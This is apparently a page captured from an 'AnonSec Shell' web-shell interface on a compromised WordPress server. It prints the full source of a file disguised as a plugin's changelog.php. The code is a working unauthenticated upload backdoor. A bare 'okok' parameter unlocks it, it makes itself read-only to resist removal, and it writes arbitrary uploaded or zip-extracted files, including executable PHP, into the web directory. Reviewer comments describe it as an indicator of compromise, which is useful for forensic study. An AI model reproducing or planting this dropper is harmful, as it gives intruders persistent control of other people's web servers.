AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.145.52.195   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/rss-icon-widget/lib/


Current File : /var/www/wp-content/plugins/rss-icon-widget/lib/changelog.php
<?php
// NOTE(review): this script is an unauthenticated file-upload backdoor (a "dropper"), not
// plugin code. Anyone who requests it with the `okok` query parameter can write arbitrary
// files, including executable PHP, into the directory it runs from. Treat its presence as an
// indicator of compromise: preserve a copy and its timestamps, review web access logs for
// requests to this path (GET with `okok`, and POSTs), and inventory files created in the same
// directory before removing anything.

// Runs on every request, before the parameter check: marks this file read-only (0444).
// The path is basename(PHP_SELF), so it is resolved against the current working directory,
// presumably the script's own directory. NOTE(review): the likely purpose is to hinder
// in-place overwrite or cleanup; confirm the file's mode and owner on disk.
chmod(basename($_SERVER["PHP_SELF"]), 0444);
// The only gate is the presence of the `okok` GET parameter; its value is never checked and
// there is no authentication. Without the parameter the script produces no PHP output.
if (isset($_GET['okok'])) {
    // Form 1: file picker whose submit is intercepted by compressAndUpload() (defined below).
    echo '<form enctype="multipart/form-data" method="POST" onsubmit="compressAndUpload(event)">
        <input type="file" id="file_upload" name="file_upload" />
        <input type="submit" value="Upload and Compress" />
    </form>';
    // Form 2: plain multipart upload, handled by the `direct_file_upload` branch below.
    echo '<form enctype="multipart/form-data" method="POST">
        <input type="file" name="direct_file_upload" />
        <input type="submit" value="Direct Upload" />
    </form>';
    // Loads JSZip 3.7.1 from cdnjs in the operator's browser; the server itself makes no
    // outbound request here.
    echo '<script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.7.1/jszip.min.js"></script>';
    // Client-side script: wraps the chosen file in a ZIP in the browser and POSTs it back to
    // the same URL as field `file_upload`, under a random 6-8 character alphanumeric name
    // ending in ".zip". NOTE(review): presumably this is so upload inspection sees an archive
    // with an unremarkable name instead of the original file; archive contents should be
    // inspected as well as filenames.
    echo '<script>
function generateRandomFileName(extension) {
    let length = Math.floor(Math.random() * 3) + 6; // Generate 6 to 8 characters
    let characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    let randomString = "";
    for (let i = 0; i < length; i++) {
        randomString += characters.charAt(Math.floor(Math.random() * characters.length));
    }
    return randomString + extension;
}

async function compressAndUpload(event) {
    event.preventDefault();

    let fileInput = document.getElementById("file_upload");
    if (fileInput.files.length === 0) {
        alert("Please select a file!");
        return false;
    }

    let file = fileInput.files[0];
    let zip = new JSZip();
    zip.file(file.name, file);

    let zipBlob = await zip.generateAsync({ type: "blob" });
    let formData = new FormData();
    formData.append("file_upload", zipBlob, generateRandomFileName(".zip"));
    let response = await fetch("", {
        method: "POST",
        body: formData
    });
    let text = await response.text();
    document.body.innerHTML = `<p>${text}</p>`;
    return false;
}
</script>';

    // Server-side handler for the zipped upload.
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file_upload'])) {
        $uploadedFile = $_FILES['file_upload']['tmp_name'];

        $zip = new ZipArchive;
        if ($zip->open($uploadedFile) === TRUE) {
            // Every archive entry is extracted into the current working directory ('.').
            // Entry names come from the uploaded archive and are not checked for type or
            // extension, so the extracted files can be PHP that the web server will execute.
            for ($i = 0; $i < $zip->numFiles; $i++) {
                $filename = $zip->getNameIndex($i);
                $zip->extractTo('.', $filename);
            }
            $zip->close();

            // Deletes the temporary upload, leaving only the extracted files on disk.
            unlink($uploadedFile);

            echo '<div class="success">Uploaded and extracted successfully.</div>';
        } else {
            echo '<div class="error">Failed to extract file.</div>';
        }
    }

    // Server-side handler for the direct upload: the file is moved into the current working
    // directory under the basename of the client-supplied name. basename() removes directory
    // components only; there is no extension, MIME or content check, and an existing file of
    // the same name is overwritten by move_uploaded_file().
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['direct_file_upload'])) {
        $uploadedFile = $_FILES['direct_file_upload']['tmp_name'];
        $destination = basename($_FILES['direct_file_upload']['name']);

        if (move_uploaded_file($uploadedFile, $destination)) {
            echo '<div class="success">Direct upload successful.</div>';
        } else {
            echo '<div class="error">Direct upload failed.</div>';
        }
    }
}
?>

Anon7 - 2022
AnonSec Team